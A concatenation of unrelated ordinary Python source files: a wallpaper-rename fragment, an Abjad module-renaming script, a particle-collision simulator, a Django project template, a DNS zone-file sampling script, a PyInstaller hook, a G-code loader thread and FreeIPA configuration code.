        extension = os.path.splitext(filename)[1]
        # Rename the existing random wallpaper to something random
        # (the fractional digits of random.random() serve as the new name).
        newname = os.path.join(
            picturespath, str(random.random()).rsplit('.', 1)[1] + extension)
        os.rename(os.path.join(picturespath, filename), newname)

# Promote the picked file to be the new 'random' wallpaper.
os.rename(os.path.join(picturespath, rfilename),
          os.path.join(picturespath, 'random' + rextension))
|
import os
from abjad.tools import documentationtools
from abjad.tools import systemtools
from abjad.tools.developerscripttools.DeveloperScript import DeveloperScript
from abjad.tools.developerscripttools.ReplaceInFilesScript \
import ReplaceInFilesScript
class RenameModulesScript(DeveloperScript):
    r'''Renames classes and functions.

    Handles renaming the module and package, as well as any tests,
    documentation or mentions of the class throughout the Abjad codebase:

    .. shell::

        ajv rename --help

    '''

    ### PUBLIC PROPERTIES ###

    @property
    def alias(self):
        r'''Alias of script.

        Returns ``'rename'``.
        '''
        return 'rename'

    @property
    def long_description(self):
        r'''Long description of script.

        Returns string or none.
        '''
        return None

    @property
    def scripting_group(self):
        r'''Scripting group of script.

        Returns none.
        '''
        return None

    @property
    def short_description(self):
        r'''Short description of script.

        Returns string.
        '''
        return 'Rename public modules.'

    @property
    def version(self):
        r'''Version of script.

        Returns float.
        '''
        return 1.0

    ### PRIVATE METHODS ###

    def _codebase_name_to_codebase_docs_path(self, codebase):
        r'''Map ``'mainline'`` or ``'experimental'`` to that codebase's API
        docs directory; raise for any other name.
        '''
        from abjad import abjad_configuration
        if codebase == 'mainline':
            return os.path.join(
                abjad_configuration.abjad_directory,
                'docs',
                'source',
                'api',
                'tools',
                )
        elif codebase == 'experimental':
            return os.path.join(
                abjad_configuration.abjad_experimental_directory,
                'docs',
                'source',
                'tools',
                )
        message = 'bad codebase name: {!r}.'
        message = message.format(codebase)
        raise Exception(message)

    def _codebase_name_to_codebase_tools_path(self, codebase):
        r'''Map ``'mainline'`` or ``'experimental'`` to that codebase's
        tools directory; raise for any other name.
        '''
        from abjad import abjad_configuration
        if codebase == 'mainline':
            return os.path.join(
                abjad_configuration.abjad_directory, 'tools')
        elif codebase == 'experimental':
            return os.path.join(
                abjad_configuration.abjad_experimental_directory, 'tools')
        message = 'bad codebase name: {!r}.'
        message = message.format(codebase)
        raise Exception(message)

    def _confirm_name_changes(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        r'''Show the proposed rename and ask the user to confirm it.

        Returns True on 'y'/'yes', False on 'n'/'no' (any other answer
        implicitly returns None, which callers treat as falsy); raises
        SystemExit on 'a'/'abort'/'q'/'quit'.
        '''
        max_codebase = max(len(old_codebase), len(new_codebase))
        old_codebase = old_codebase.ljust(max_codebase)
        new_codebase = new_codebase.ljust(max_codebase)
        print('')
        print('Is ...')
        print('')
        print(' [{}] {}.{}()'.format(
            old_codebase, old_tools_package_name, old_module_name))
        print(' ===>')
        print(' [{}] {}.{}()'.format(
            new_codebase, new_tools_package_name, new_module_name))
        print('')
        # NOTE: raw_input is the Python 2 builtin (this script targets
        # Python 2); under Python 3 this would be input().
        string = raw_input('... correct [yes, no, abort]? ').lower()
        print('')
        if string in ('y', 'yes'):
            return True
        elif string in ('a', 'abort', 'q', 'quit'):
            raise SystemExit
        elif string in ('n', 'no'):
            return False

    def _get_object_names(self, kind, codebase, tools_package_name):
        r'''Collect every class or function (including private ones)
        defined in `tools_package_name`, sorted by name.
        '''
        assert kind in ('class', 'function')
        tools_path = self._codebase_name_to_codebase_tools_path(codebase)
        path = os.path.join(tools_path, tools_package_name)
        if kind == 'class':
            generator = documentationtools.yield_all_classes(
                code_root=path,
                include_private_objects=True,
                )
        elif kind == 'function':
            generator = documentationtools.yield_all_functions(
                code_root=path,
                include_private_objects=True,
                )
        return tuple(sorted(generator, key=lambda x: x.__name__))

    def _get_tools_package_names(self, codebase):
        r'''List the public tools package directories of `codebase`,
        sorted by name.
        '''
        tools_path = self._codebase_name_to_codebase_tools_path(codebase)
        names = []
        for x in os.listdir(tools_path):
            if os.path.isdir(os.path.join(tools_path, x)):
                if not x.startswith(('_', '.')):
                    names.append(x)
        return tuple(sorted(names))

    def _parse_tools_package_path(self, path):
        r'''Split a ``'toolspackage.module'`` path and locate which
        codebase (mainline first, then experimental) contains it.

        Returns (codebase, tools_package_name, module_name); raises
        SystemExit when the path is malformed or cannot be found.
        '''
        from abjad import abjad_configuration
        if '.' not in path:
            raise SystemExit
        tools_package_name, module_name = path.split('.')
        mainline_tools_directory = os.path.join(
            abjad_configuration.abjad_directory,
            'tools',
            )
        for directory_name in os.listdir(mainline_tools_directory):
            directory = os.path.join(
                mainline_tools_directory, directory_name)
            if not os.path.isdir(directory):
                continue
            elif directory_name != tools_package_name:
                continue
            return 'mainline', tools_package_name, module_name
        experimental_tools_directory = os.path.join(
            abjad_configuration.abjad_experimental_directory,
            'tools',
            )
        # BUG FIX: this loop previously listed the *mainline* tools
        # directory, so experimental packages could never be found.
        for directory_name in os.listdir(experimental_tools_directory):
            directory = os.path.join(
                experimental_tools_directory, directory_name)
            if not os.path.isdir(directory):
                continue
            elif directory_name != tools_package_name:
                continue
            return 'experimental', tools_package_name, module_name
        raise SystemExit

    def _rename_old_api_page(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        r'''Move the module's ``.rst`` API page to its new location.
        '''
        print('Renaming old API page ...')
        old_docs_path = self._codebase_name_to_codebase_docs_path(old_codebase)
        new_docs_path = self._codebase_name_to_codebase_docs_path(new_codebase)
        old_rst_file_name = old_module_name + '.rst'
        new_rst_file_name = new_module_name + '.rst'
        old_api_path = os.path.join(
            old_docs_path, old_tools_package_name, old_rst_file_name)
        new_api_path = os.path.join(
            new_docs_path, new_tools_package_name, new_rst_file_name)
        command = 'mv {} {}'.format(
            old_api_path, new_api_path)
        systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _rename_old_module(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        r'''Move the module file itself via ``git mv -f`` so history is
        preserved.
        '''
        print('Renaming old module ...')
        old_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        new_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        old_module = old_module_name + '.py'
        old_path = os.path.join(
            old_tools_path, old_tools_package_name, old_module)
        new_module = new_module_name + '.py'
        new_path = os.path.join(
            new_tools_path, new_tools_package_name, new_module)
        command = 'git mv -f {} {}'.format(
            old_path, new_path)
        systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _rename_old_test_files(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        r'''Move every ``test_<package>_<module>*.py`` file to the new
        package/module naming via ``git mv -f``; no-op when the old test
        directory does not exist.
        '''
        print('Renaming old test file(s) ...')
        old_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        old_test_path = os.path.join(
            old_tools_path, old_tools_package_name, 'test')
        if not os.path.exists(old_test_path):
            return
        new_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        new_test_path = os.path.join(
            new_tools_path, new_tools_package_name, 'test')
        old_test_file_prefix = 'test_{}_{}'.format(
            old_tools_package_name, old_module_name)
        old_test_file_names = [x for x in os.listdir(old_test_path)
            if x.startswith(old_test_file_prefix) and x.endswith('.py')]
        for old_test_file_name in old_test_file_names:
            old_test_file_path = os.path.join(
                old_test_path, old_test_file_name)
            # Keep any suffix after the common prefix (e.g. '_01.py').
            old_test_file_suffix = old_test_file_name[
                len(old_test_file_prefix):]
            new_test_file_name = 'test_{}_{}{}'.format(
                new_tools_package_name, new_module_name, old_test_file_suffix)
            new_test_file_path = os.path.join(
                new_test_path, new_test_file_name)
            command = 'git mv -f {} {}'.format(
                old_test_file_path, new_test_file_path)
            systemtools.IOManager.spawn_subprocess(command)
        print('')

    def _update_codebase(self,
        old_codebase,
        old_tools_package_name,
        old_module_name,
        new_codebase,
        new_tools_package_name,
        new_module_name,
        ):
        r'''Rewrite references across the whole codebase in three passes:
        qualified ``package.module`` names, test-file name stems, and the
        bare module name (whole words only, build directories excluded).
        '''
        from abjad import abjad_configuration
        without_dirs = ['--without-dirs', 'build', '--without-dirs', '_build']
        directory = abjad_configuration.abjad_root_directory
        print('Updating codebase ...')
        print('')
        old_text = '{}.{}'.format(old_tools_package_name, old_module_name)
        new_text = '{}.{}'.format(new_tools_package_name, new_module_name)
        command = [
            directory,
            old_text,
            new_text,
            '--force',
            '--whole-words-only',
            #'--verbose',
            ]
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')
        old_text = 'test_{}_{}_'.format(
            old_tools_package_name, old_module_name)
        new_text = 'test_{}_{}_'.format(
            new_tools_package_name, new_module_name)
        command = [directory, old_text, new_text, '--force', '--verbose']
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')
        old_text = old_module_name
        new_text = new_module_name
        command = [
            directory,
            old_text,
            new_text,
            '--force',
            '--whole-words-only',
            #'--verbose',
            ]
        command.extend(without_dirs)
        ReplaceInFilesScript()(command)
        print('')

    ### PUBLIC METHODS ###

    def process_args(self, args):
        r'''Processes `args`.

        Returns none.
        '''
        systemtools.IOManager.clear_terminal()
        # Handle source path:
        old_codebase, old_tools_package_name, old_module_name = \
            self._parse_tools_package_path(args.source)
        old_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
            old_codebase)
        old_module_path = os.path.join(
            old_codebase_tools_path,
            old_tools_package_name,
            old_module_name + '.py',
            )
        if not os.path.exists(old_module_path):
            message = 'source does not exist: {}'
            message = message.format(old_module_path)
            raise SystemExit(message)
        # Handle destination path:
        new_codebase, new_tools_package_name, new_module_name = \
            self._parse_tools_package_path(args.destination)
        new_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
            new_codebase)
        new_module_path = os.path.join(
            new_codebase_tools_path,
            new_tools_package_name,
            new_module_name + '.py',
            )
        if os.path.exists(new_module_path):
            message = 'destination already exists: {}'
            # BUG FIX: the message previously reported the *source* path.
            message = message.format(new_module_path)
            raise SystemExit(message)
        # Process changes:
        new_args = (
            old_codebase, old_tools_package_name, old_module_name,
            new_codebase, new_tools_package_name, new_module_name,
            )
        if not self._confirm_name_changes(*new_args):
            raise SystemExit
        self._rename_old_test_files(*new_args)
        self._rename_old_api_page(*new_args)
        self._rename_old_module(*new_args)
        self._update_codebase(*new_args)
        raise SystemExit

    def setup_argument_parser(self, parser):
        r'''Sets up argument `parser`.

        Returns none.
        '''
        parser.add_argument(
            'source',
            help='toolspackage path of source module',
            )
        parser.add_argument(
            'destination',
            help='toolspackage path of destination module',
            )
|
"""
Module defining the Event class which is used to manage collissions and check their validity
"""
from itertools import combinations
from copy import copy
from particle import Particle
class EventParticle(object):
    """A pending collision between two particles.

    The event caches the pair's collision counts as an identity stamp;
    once either particle collides elsewhere, the stamp no longer matches
    and the event is invalid.
    """

    def __init__(self, particle1, particle2):
        self.particle1 = particle1
        self.particle2 = particle2
        self.reevaluateCollisionTime()

    def _currentStamp(self):
        # Snapshot of both particles' collision counters.
        return (self.particle1.getCollisionCountAsCopy(),
                self.particle2.getCollisionCountAsCopy())

    def isValid(self):
        """True while neither particle has collided since scheduling."""
        return self.id == self._currentStamp()

    def reevaluateCollisionTime(self):
        """Refresh the identity stamp and the predicted collision time."""
        self.id = self._currentStamp()
        self.timeUntilCollision = self.particle1.collideParticle(self.particle2)

    def doCollision(self):
        """Perform the particle-particle bounce."""
        self.particle1.bounceParticle(self.particle2)
class EventWallX(object):
    """A pending collision between one particle and a vertical wall."""

    def __init__(self, particle):
        self.particle = particle
        self.reevaluateCollisionTime()

    def isValid(self):
        """True while the particle has not collided since scheduling."""
        return self.particle.getCollisionCountAsCopy() == self.id

    def reevaluateCollisionTime(self):
        """Refresh the identity stamp and the predicted wall-hit time."""
        self.id = self.particle.getCollisionCountAsCopy()
        self.timeUntilCollision = self.particle.collidesWallX()

    def doCollision(self):
        """Reflect the particle's x velocity."""
        self.particle.bounceX()
class EventWallY(object):
    """A pending collision between one particle and a horizontal wall."""

    def __init__(self, particle):
        self.particle = particle
        self.reevaluateCollisionTime()

    def isValid(self):
        """True while the particle has not collided since scheduling."""
        return self.particle.getCollisionCountAsCopy() == self.id

    def reevaluateCollisionTime(self):
        """Refresh the identity stamp and the predicted wall-hit time."""
        self.id = self.particle.getCollisionCountAsCopy()
        self.timeUntilCollision = self.particle.collidesWallY()

    def doCollision(self):
        """Reflect the particle's y velocity."""
        self.particle.bounceY()
class EventManager(object):
    """Event-driven simulation loop over a fixed set of particles.

    Maintains one event per particle pair plus two wall events per
    particle, kept sorted by time-to-collision.
    """

    def __init__(self, ListOfParticles):
        self.ListOfParticles = ListOfParticles
        # Pairwise particle events first, then both wall events per particle.
        self.ListOfEvents = [
            EventParticle(first, second)
            for first, second in combinations(self.ListOfParticles, 2)
        ]
        for particle in self.ListOfParticles:
            self.ListOfEvents.extend(
                (EventWallX(particle), EventWallY(particle)))
        self.sortEventList()

    def sortEventList(self):
        """Sort events by time; missing/negative times sink to the end."""
        def event_key(event):
            t = event.timeUntilCollision
            # 1.0e7 acts as "effectively never".
            return 1.0e7 if t is None or t < 0.0 else t
        self.ListOfEvents.sort(key=event_key)

    def step(self):
        """Advance the system to (and through) the next valid collision."""
        for event in self.ListOfEvents:
            if not event.isValid():
                event.reevaluateCollisionTime()
        self.sortEventList()
        dt = copy(self.ListOfEvents[0].timeUntilCollision)
        for particle in self.ListOfParticles:
            particle.advance(dt)
        self.ListOfEvents[0].doCollision()
        # Shift every scheduled event into the new time frame.
        for event in self.ListOfEvents:
            if event.timeUntilCollision is not None:
                event.timeUntilCollision -= dt
if __name__ == '__main__':
    # Tiny visual smoke test: two particles bouncing in the unit box.
    import numpy as np
    import pylab as plt
    a = Particle(np.array([0.1, 0.5]), np.array([0.01, 0.1]), 0.05, 2.0)
    b = Particle(np.array([0.4, 0.5]), np.array([-0.1, 0.01]), 0.05, 2.0)
    manager = EventManager([a, b])
    for i in range(20):
        plt.title(a.t)
        plt.scatter([a._x[0], b._x[0]], [a._x[1], b._x[1]])
        # BUG FIX: "print a._x" is Python-2-only syntax (SyntaxError under
        # Python 3); the call form works on both interpreters.
        print(a._x)
        print(b._x)
        plt.xlim([0, 1])
        plt.ylim([0, 1])
        plt.show()
        manager.step()
|
""" Projy template for PythonPackage. """
from datetime import date
from os import mkdir, rmdir
from shutil import move
from subprocess import call
from projy.templates.ProjyTemplate import ProjyTemplate
from projy.collectors.AuthorCollector import AuthorCollector
from projy.collectors.AuthorMailCollector import AuthorMailCollector
class DjangoProjectTemplate(ProjyTemplate):
    """ Projy template class for PythonPackage. """
    def __init__(self):
        ProjyTemplate.__init__(self)
    def directories(self):
        """ Return the names of directories to be created. """
        directories_description = [
            self.project_name,
            self.project_name + '/conf',
            self.project_name + '/static',
        ]
        return directories_description
    def files(self):
        """ Return the names of files to be created.

        Each entry is [target directory, file name, template class name].
        """
        files_description = [
            # configuration
            [ self.project_name,
            'Makefile',
            'DjangoMakefileTemplate' ],
            [ self.project_name + '/conf',
            'requirements_base.txt',
            'DjangoRequirementsBaseTemplate' ],
            [ self.project_name + '/conf',
            'requirements_dev.txt',
            'DjangoRequirementsDevTemplate' ],
            [ self.project_name + '/conf',
            'requirements_production.txt',
            'DjangoRequirementsProdTemplate' ],
            [ self.project_name + '/conf',
            'nginx.conf',
            'DjangoNginxConfTemplate' ],
            [ self.project_name + '/conf',
            'supervisord.conf',
            'DjangoSupervisorConfTemplate' ],
            [ self.project_name,
            'fabfile.py',
            'DjangoFabfileTemplate' ],
            [ self.project_name,
            'CHANGES.txt',
            'PythonPackageCHANGESFileTemplate' ],
            [ self.project_name,
            'LICENSE.txt',
            'GPL3FileTemplate' ],
            [ self.project_name,
            'README.txt',
            'READMEReSTFileTemplate' ],
            [ self.project_name,
            '.gitignore',
            'DjangoGitignoreTemplate' ],
            # django files
            [ self.project_name,
            'dev.py',
            'DjangoSettingsDevTemplate' ],
            [ self.project_name,
            'prod.py',
            'DjangoSettingsProdTemplate' ],
        ]
        return files_description
    def substitutes(self):
        """ Return the substitutions for the templating replacements. """
        author_collector = AuthorCollector()
        mail_collector = AuthorMailCollector()
        substitute_dict = {
            'project': self.project_name,
            'project_lower': self.project_name.lower(),
            'date': date.today().isoformat(),
            'author': author_collector.collect(),
            'author_email': mail_collector.collect(),
        }
        return substitute_dict
    def posthook(self):
        # Post-generation steps, order-sensitive: each move/rmdir below
        # assumes the previous one already happened.
        # build the virtualenv
        call(['make'])
        # create the Django project
        call(['./venv/bin/django-admin.py', 'startproject', self.project_name])
        # transform original settings files into 3 files for different env
        mkdir('{p}/settings'.format(p=self.project_name))
        self.touch('{p}/settings/__init__.py'.format(p=self.project_name))
        move('dev.py', '{p}/settings'.format(p=self.project_name))
        move('prod.py', '{p}/settings'.format(p=self.project_name))
        move('{p}/{p}/settings.py'.format(p=self.project_name), '{p}/settings/base.py'.format(p=self.project_name))
        # organize files nicely
        mkdir('{p}/templates'.format(p=self.project_name))
        move('{p}/manage.py'.format(p=self.project_name), 'manage.py')
        move('{p}/{p}/__init__.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
        move('{p}/{p}/urls.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
        move('{p}/{p}/wsgi.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
        rmdir('{p}/{p}'.format(p=self.project_name))
        # create empty git repo
        call(['git', 'init'])
        # replace some lines
        # NOTE(review): this points wsgi.py at "<project>.settings.production",
        # but the settings module created above is named prod.py
        # ("<project>.settings.prod") -- verify which name is intended.
        self.replace_in_file('{p}/wsgi.py'.format(p=self.project_name),
                            '"{p}.settings"'.format(p=self.project_name),
                            '"{p}.settings.production"'.format(p=self.project_name))
        # fill in the ADMINS entry of the generated base settings
        self.replace_in_file('{p}/settings/base.py'.format(p=self.project_name),
                            u"    # ('Your Name', 'your_email@example.com'),",
                            u"    ('{}', '{}'),".format(self.substitutes()['author'],
                            self.substitutes()['author_email']))
|
import os
import sys
import random
import dns.resolver

# Number of NS-derived domains to sample per TLD and how many of the
# largest qualifying TLDs to report on.
numTestDomains = 100
numTopTLDs = 100
# Infrastructure / special-cased zones that should never be sampled.
ignoreDomains = ['com', 'net', 'jobs', 'cat', 'mil', 'edu', 'gov', 'int', 'arpa']
serverZone = '.ws.sp.am' # DNS Zone containing CNAME records pointing to whois FQDNs

def dbg(s):
    # Debug hook -- intentionally a no-op; point it at print/logging as needed.
    pass

random.seed()
zFiles = os.listdir('zonefiles/')
tlds = []
for zf in zFiles:
    dbg(zf)
    tld = {}
    if zf.find(".txt") == -1:
        dbg("This should not happen")
        continue
    zfh = open('zonefiles/' + zf, 'r')
    lines = zfh.read().splitlines()
    zfh.close()
    dbg("after file read")
    # Guard against an empty zone file (lines[0] would raise IndexError).
    if not lines:
        continue
    # The first label of the first record is the TLD name itself.
    tld['name'] = lines[0].split(".")[0].strip()
    if tld['name'] in ignoreDomains:
        dbg("Ignoring:" + tld['name'])
        continue
    dbg("after name split")
    rrs = []
    for line in lines:
        rr = line.split("\t")
        rrs.append(rr)
    dbg("after rr split")
    ns = []
    for rr in rrs:
        # Guard short/malformed lines before indexing the record type field.
        if len(rr) > 3 and rr[3].lower() == 'ns':
            ns.append(rr[0].split(".")[0])
    dbg("after counting NS records")
    if len(ns) < numTestDomains:
        continue
    else:
        tld['size'] = len(ns)
        tld['domains'] = random.sample(ns, numTestDomains)
        for d in tld['domains']:
            dbg(d + "." + tld['name'])
        dbg(tld['name'] + ": " + str(tld['size']))
        tlds.append(tld)
tlds.sort(key=lambda tld: tld['size'], reverse=True)
# BUG FIX: iterate over at most len(tlds) entries -- xrange(numTopTLDs)
# raised IndexError whenever fewer TLDs qualified. range() also keeps this
# working on both Python 2 and 3.
for ii in range(min(numTopTLDs, len(tlds))):
    # Find FQDN of whois server
    d = dns.resolver.Resolver()
    try:
        resp = d.query(tlds[ii]['name'] + serverZone, 'CNAME')
        if len(resp.rrset) < 1:
            whois = 'UNKNOWN'
        else:
            whois = str(resp.rrset[0]).strip('.')
    except Exception:
        # Narrowed from a bare except so Ctrl-C/SystemExit still abort.
        whois = 'UNKNOWN'
    s = whois + ','
    for dom in tlds[ii]['domains']:
        s += dom + '.' + tlds[ii]['name'] + ','
    print(s.strip(','))
|
from PyInstaller.utils.hooks import exec_statement
# PyInstaller hook: execute the import in a helper process so the build
# analysis can observe whatever wx.lib.activex pulls in at import time.
exec_statement("import wx.lib.activex")
|
from PySide import QtCore
from GCodeAnalyzer import GCodeAnalyzer
import sys
import pycnc_config
class GCodeLoader(QtCore.QThread):
    """Background thread that loads a G-code file and precomputes, per line,
    the cumulative travel time via GCodeAnalyzer.

    Emits ``load_finished`` on success and ``load_error`` (with a message
    string) on failure.
    """

    load_finished = QtCore.Signal()
    load_error = QtCore.Signal(object)

    def __init__(self):
        QtCore.QThread.__init__(self)
        self.file = None        # path of the file to load (set by load())
        self.gcode = None       # raw G-code lines
        self.times = None       # cumulative travel time in seconds per line
        self.bBox = None        # bounding box reported by the analyzer
        self.loaded = False     # True once a file loaded successfully
        self.totalTime = 0      # total travel time of the loaded file (s)
        self.busy = False       # True while run() is working
        self.g0_feed = pycnc_config.G0_FEED

    def run(self):
        """Thread body: parse self.file line by line, tracking travel time."""
        self.loaded = False
        self.gcode = []
        self.times = []
        self.bBox = None
        self.totalTime = 0
        self.busy = True
        analyzer = GCodeAnalyzer()
        analyzer.fastf = self.g0_feed
        try:
            with open(self.file) as f:
                for line in f:
                    analyzer.Analyze(line)
                    self.gcode.append(line)
                    self.times.append(analyzer.getTravelTime()*60) # time returned is in minutes: convert to seconds
        # BUG FIX: was a bare "except:", which also swallowed
        # KeyboardInterrupt/SystemExit; those now propagate.
        except Exception:
            self.busy = False
            e = sys.exc_info()[0]
            self.load_error.emit("%s" % e)
            return
        self.busy = False
        self.loaded = True
        # BUG FIX: an empty file left self.times empty and
        # self.times[-1] raised IndexError.
        self.totalTime = self.times[-1] if self.times else 0
        self.bBox = analyzer.getBoundingBox()
        self.load_finished.emit()

    def load(self, file):
        """Start loading *file* asynchronously (returns immediately)."""
        self.file = file
        self.start()
|
from __future__ import absolute_import
from optparse import (
Option, Values, OptionParser, IndentedHelpFormatter, OptionValueError)
from copy import copy
from configparser import SafeConfigParser
from urllib.parse import urlsplit
import socket
import functools
from dns.exception import DNSException
import dns.name
from ipaplatform.paths import paths
from ipapython.dn import DN
from ipapython.dnsutil import query_srv
from ipapython.ipautil import CheckedIPAddress, CheckedIPAddressLoopback
class IPAConfigError(Exception):
    """Raised when a required IPA default (realm/server/domain) is missing."""

    def __init__(self, msg=''):
        # Keep the message on the instance so __repr__/__str__ can echo it.
        self.msg = msg
        super(IPAConfigError, self).__init__(msg)

    def __repr__(self):
        return self.msg

    __str__ = __repr__
class IPAFormatter(IndentedHelpFormatter):
    """Our own optparse formatter that indents multiple lined usage string."""

    def format_usage(self, usage):
        """Prefix the first usage line with 'Usage:' and align the rest."""
        prefix = "Usage:"
        pad = " " * len(prefix)
        first, *rest = usage.split("\n")
        pieces = ["%s %s\n" % (prefix, first)]
        pieces.extend("%s %s\n" % (pad, line) for line in rest)
        return "".join(pieces)
def check_ip_option(option, opt, value, allow_loopback=False):
    """optparse type checker: parse *value* as a checked IP address.

    Loopback addresses are accepted only when *allow_loopback* is set.
    Raises OptionValueError on any parse failure.
    """
    try:
        checker = CheckedIPAddressLoopback if allow_loopback else CheckedIPAddress
        return checker(value)
    except Exception as e:
        raise OptionValueError("option {}: invalid IP address {}: {}"
                               .format(opt, value, e))
def check_dn_option(option, opt, value):
    """optparse type checker: parse *value* into a DN.

    Raises OptionValueError on any parse failure.
    """
    try:
        return DN(value)
    except Exception as e:
        msg = "option %s: invalid DN: %s" % (opt, e)
        raise OptionValueError(msg)
def check_constructor(option, opt, value):
    """optparse type checker: build the value via ``option.constructor``.

    Raises OptionValueError when the constructor rejects *value*.
    """
    constructor = option.constructor
    assert constructor is not None, "Oops! Developer forgot to set 'constructor' kwarg"
    try:
        return constructor(value)
    except Exception as e:
        raise OptionValueError("option {} invalid: {}".format(opt, e))
class IPAOption(Option):
    """
    optparse.Option subclass with support of options labeled as
    security-sensitive such as passwords.
    """
    # Extra keyword arguments accepted by this Option subclass:
    #   sensitive   -- marks the option so IPAOptionParser.get_safe_opts()
    #                  can filter its value out
    #   constructor -- callable used by the "constructor" option type
    ATTRS = Option.ATTRS + ["sensitive", "constructor"]
    # Custom option value types, each wired to its checker below.
    TYPES = Option.TYPES + ("ip", "dn", "constructor", "ip_with_loopback")
    TYPE_CHECKER = copy(Option.TYPE_CHECKER)
    TYPE_CHECKER["ip"] = check_ip_option
    TYPE_CHECKER["ip_with_loopback"] = functools.partial(check_ip_option,
                                                         allow_loopback=True)
    TYPE_CHECKER["dn"] = check_dn_option
    TYPE_CHECKER["constructor"] = check_constructor
class IPAOptionParser(OptionParser):
    """
    optparse.OptionParser subclass that uses IPAOption by default
    for storing options.
    """

    def __init__(self,
                 usage=None,
                 option_list=None,
                 option_class=IPAOption,
                 version=None,
                 conflict_handler="error",
                 description=None,
                 formatter=None,
                 add_help_option=True,
                 prog=None):
        OptionParser.__init__(self, usage, option_list, option_class,
                              version, conflict_handler, description,
                              formatter, add_help_option, prog)

    def get_safe_opts(self, opts):
        """
        Returns all options except those with sensitive=True in the same
        fashion as parse_args would
        """
        # Map each option's dest to its 'sensitive' flag.
        sensitive_by_dest = {
            opt.dest: opt.sensitive
            for opt in self._get_all_options()
            if hasattr(opt, 'sensitive')
        }
        safe = {
            dest: value
            for dest, value in opts.__dict__.items()
            if not sensitive_by_dest[dest]
        }
        return Values(safe)
def verify_args(parser, args, needed_args = None):
    """Verify that we have all positional arguments we need, if not, exit.

    *needed_args* is a space-separated string naming the required
    positional arguments, in order; ``parser.error`` is invoked with a
    descriptive message on mismatch.
    """
    needed_list = needed_args.split(" ") if needed_args else []
    have = len(args)
    need = len(needed_list)
    if have > need:
        parser.error("too many arguments")
    elif have < need:
        # Name the first missing argument.
        parser.error("no %s specified" % needed_list[have])
class IPAConfig:
    """Container for the default IPA realm, server list and domain.

    Each getter raises IPAConfigError when its value was never populated.
    """

    def __init__(self):
        self.default_realm = None
        self.default_server = []
        self.default_domain = None

    def get_realm(self):
        if not self.default_realm:
            raise IPAConfigError("no default realm")
        return self.default_realm

    def get_server(self):
        if not len(self.default_server):
            raise IPAConfigError("no default server")
        return self.default_server

    def get_domain(self):
        if not self.default_domain:
            raise IPAConfigError("no default domain")
        return self.default_domain
config = IPAConfig()
def __parse_config(discover_server = True):
    """Fill missing fields of the module-level ``config`` from the
    [global] section of the IPA default config file.

    Existing values are kept; server lookup from xmlrpc_uri only happens
    when *discover_server* is true. All lookup failures are ignored.
    """
    # NOTE(review): SafeConfigParser is a deprecated alias that was removed
    # in Python 3.12 -- confirm the target interpreter version.
    p = SafeConfigParser()
    p.read(paths.IPA_DEFAULT_CONF)
    if not config.default_realm:
        try:
            config.default_realm = p.get("global", "realm")
        except Exception:
            pass
    if discover_server:
        try:
            server = urlsplit(p.get("global", "xmlrpc_uri"))
            config.default_server.append(server.netloc)
        except Exception:
            pass
    if not config.default_domain:
        try:
            config.default_domain = p.get("global", "domain")
        except Exception:
            pass
def __discover_config(discover_server = True):
    # Best-effort DNS discovery of the default domain and (optionally) the
    # IPA servers, via _ldap._tcp SRV records. Mutates the module-level
    # ``config``; returns False when domain discovery gives up, otherwise
    # None (callers ignore the return value).
    servers = []
    try:
        if not config.default_domain:
            # try once with REALM -> domain
            domain = str(config.default_realm).lower()
            name = "_ldap._tcp." + domain
            try:
                servers = query_srv(name)
            except DNSException:
                # try cycling on domain components of FQDN
                try:
                    domain = dns.name.from_text(socket.getfqdn())
                except DNSException:
                    return False
                # Walk up the name one label at a time until an SRV record
                # answers or we reach the DNS root.
                while True:
                    domain = domain.parent()
                    if str(domain) == '.':
                        return False
                    name = "_ldap._tcp.%s" % domain
                    try:
                        servers = query_srv(name)
                        break
                    except DNSException:
                        pass
            config.default_domain = str(domain).rstrip(".")
        if discover_server:
            # Reuse SRV answers from domain discovery when available;
            # otherwise query under the (possibly pre-set) default domain.
            if not servers:
                name = "_ldap._tcp.%s." % config.default_domain
                try:
                    servers = query_srv(name)
                except DNSException:
                    pass
            for server in servers:
                hostname = str(server.target).rstrip(".")
                config.default_server.append(hostname)
    except Exception:
        # Discovery is best-effort: init_config() reports any values that
        # are still missing afterwards.
        pass
    return None
def add_standard_options(parser):
    """Attach the common --realm/--server/--domain override options to
    *parser* (an optparse-style parser)."""
    parser.add_option("--realm", dest="realm",
                      help="Override default IPA realm")
    parser.add_option("--server", dest="server",
                      help="Override default FQDN of IPA server")
    parser.add_option("--domain", dest="domain",
                      help="Override default IPA DNS domain")
def init_config(options=None):
    """Populate the global ``config`` from CLI *options*, then the config
    file, then DNS discovery; raise IPAConfigError for anything still
    missing afterwards.
    """
    if options:
        config.default_realm = options.realm
        config.default_domain = options.domain
        if options.server:
            config.default_server.extend(options.server.split(","))
    # Only fall back to SRV discovery when no server was given explicitly.
    discover_server = not len(config.default_server)
    __parse_config(discover_server)
    __discover_config(discover_server)
    # make sure the server list only contains unique items
    # (dict.fromkeys preserves insertion order)
    config.default_server = list(dict.fromkeys(config.default_server))
    if not config.default_realm:
        raise IPAConfigError("IPA realm not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.")
    if not config.default_server:
        raise IPAConfigError("IPA server not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.")
    if not config.default_domain:
